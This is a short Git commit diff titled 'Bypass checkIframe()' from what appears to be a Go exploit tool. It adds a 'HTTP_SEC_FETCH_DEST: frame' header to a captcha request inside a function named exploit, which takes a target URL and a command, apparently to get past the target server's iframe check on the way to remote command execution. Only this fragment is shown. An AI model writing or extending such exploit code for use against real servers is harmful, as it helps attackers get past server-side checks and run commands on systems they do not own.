Bypass checkIframe()

This commit is contained in:
M4rtin Hsu
2023-04-24 23:36:17 +08:00
parent c491c4c739
commit 831200b1d1

View File

@@ -175,6 +175,7 @@ func exploit(url string, command string, proxyURL string) bool {
captchaResp, _ := client.R().
SetHeader("User-Agent", userAgent).
SetHeader("Referer", referURL).
SetHeader("HTTP_SEC_FETCH_DEST", "frame").
Get(captchaURL)
if captchaResp.StatusCode() == 200 && captchaResp.Header().Get("Content-Type") == "image/jpeg" {